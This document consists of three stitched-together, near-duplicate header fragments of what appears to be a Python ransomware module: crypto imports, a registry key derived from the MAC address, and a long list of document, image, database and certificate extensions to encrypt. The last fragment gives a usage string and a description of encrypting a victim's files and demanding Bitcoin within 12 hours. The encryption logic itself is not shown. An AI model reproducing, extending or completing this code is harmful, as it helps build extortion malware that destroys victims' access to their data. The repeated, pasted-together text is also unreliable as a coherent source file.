import Cryptodome.Cipher.PKCS1_OAEP if sys.platform == 'win32': import _winreg # utilities import util import security # globals packages = [ '_winreg', 'Cryptodome.PublicKey.RSA', 'Cryptodome.Cipher.PKCS1_OAEP' ] platforms = ['win32'] threads = {} tasks = Queue.Queue() registry_key = md5.new(util.mac_address()).hexdigest() filetypes = [ '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg', '.tmp', '.log', '.py', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2', '.pyc', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx', '.css', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.html', '.css', '.js', '.rb', '.xml', '.wmi', '.sh', '.asp', '.aspx', '.plist', '.sql', '.vbs', '.ps1', '.sqlite' ]
# packages import Crypto.Cipher.AES import Crypto.PublicKey.RSA import Crypto.Cipher.PKCS1_OAEP if sys.platform == 'win32': import _winreg # utilities import util # globals packages = ['_winreg', 'Crypto.PublicKey.RSA', 'Crypto.Cipher.PKCS1_OAEP'] platforms = ['win32'] threads = {} tasks = Queue.Queue() registry_key = hashlib.md5(util.mac_address()).hexdigest() filetypes = [ '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg', '.tmp', '.log', '.py', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2', '.pyc', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx', '.css', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.html', '.css', '.js', '.rb', '.xml', '.wmi', '.sh', '.asp', '.aspx', '.plist', '.sql', '.vbs', '.ps1', '.sqlite' ]
# packages import Crypto.Cipher.AES import Crypto.PublicKey.RSA import Crypto.Cipher.PKCS1_OAEP if sys.platform == 'win32': import _winreg # utilities import util # globals packages = ['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP'] platforms = ['win32'] threads = {} tasks = Queue.Queue() registry_key = hashlib.md5(util.mac_address()).hexdigest() filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg', '.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx','.css', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html', '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite'] usage = 'ransom <encrypt/decrypt/payment>' description = """ Encrypt the files on a client host machine and ransom the decryption key back to the currently logged-in user for a payment in Bitcoin to a randomly generated temporary wallet address that expires in 12 hours """